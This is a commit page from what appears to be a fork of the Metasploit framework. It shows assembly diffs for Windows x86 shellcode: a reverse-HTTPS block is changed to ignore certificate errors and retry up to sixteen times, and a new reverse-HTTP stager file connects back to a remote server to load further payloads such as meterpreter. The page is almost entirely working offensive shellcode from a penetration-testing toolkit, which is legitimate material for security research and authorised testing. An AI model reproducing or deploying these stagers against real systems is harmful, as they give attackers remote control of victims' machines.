adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge in recent meterpreter work. These are not the commits you are looking for (more info on what all this is later this week).

Browse Source 
git-svn-id: file:///home/svn/framework3/trunk@13053 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore
2011-06-28 21:26:43 +00:00
parent dc1e42af2c
commit 9220506ba2
38 changed files with 742 additions and 856 deletions
Download Patch File Download Diff File Expand all files Collapse all files
external/source/shellcode/windows/x86/src/block/block_reverse_https.asm
Vendored
+16 -31
View File
@@ -23,7 +23,7 @@ internetopen:
push edi ; LPCTSTR lpszProxyBypass
push edi ; LPCTSTR lpszProxyName
push edi ; DWORD dwAccessType (PRECONFIG = 0)
push esi ; LPCTSTR lpszAgent
push esi ; LPCTSTR lpszAgent ("wininet\x00")
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
@@ -49,10 +49,9 @@ httpopenrequest:
pop ecx
xor edx, edx ; NULL
push edx ; dwContext (NULL)
push (0x80000000 | 0x04000000 | 0x00800000 | 0x00400000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
push (0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
;0x00800000 | ; INTERNET_FLAG_SECURE
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
@@ -69,9 +68,20 @@ httpopenrequest:
mov esi, eax ; hHttpRequest
set_retry:
push byte 0x02
push byte 0x10
pop ebx
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
set_security_options:
push 0x00003380
mov eax, esp
push byte 4 ; sizeof(dwFlags)
push eax ; &dwFlags
push byte 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
httpsendrequest:
xor edi, edi
push edi ; optional length
@@ -84,35 +94,10 @@ httpsendrequest:
test eax,eax
jnz short allocate_memory
check_ssl:
; In the case of an invalid certificate authority, we have to wait until the error occurs,
; set an option to disable it, then try it all over again. This wastes shellcode space,
; but its required to use this payload without a valid signed cert.
; push 0x5DE2C5AA ; hash( "kernel32.dll", "GetLastError" )
; call ebp
; cmp al, 0x0d ; ERROR_INTERNET_INVALID_CA (0x2f0d)
; Instead of wasting more bytes on GetLastError (which isn't resolving properly on Windows XP),
; we just try a second time if the initial send fails. This provides us with a real retry
; mechanism for free.
try_it_again:
dec ebx
jz failure
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
set_security_options:
push 0x00003380
mov eax, esp
push byte 4 ; sizeof(dwFlags)
push eax ; &dwFlags
push byte 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
; pop eax ; clear temporary storage (optional)
; Try it again
jmp short httpsendrequest
jmp short set_security_options
dbl_get_server_host:
jmp get_server_host
external/source/shellcode/windows/x86/src/stager/stager_reverse_http.asm
Vendored Executable
+19
View File
@@ -0,0 +1,19 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 274 bytes
; Build: >build.py stager_reverse_tcp_nx
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_http.asm"
; By here we will have performed the reverse_tcp connection and EDI will be our socket.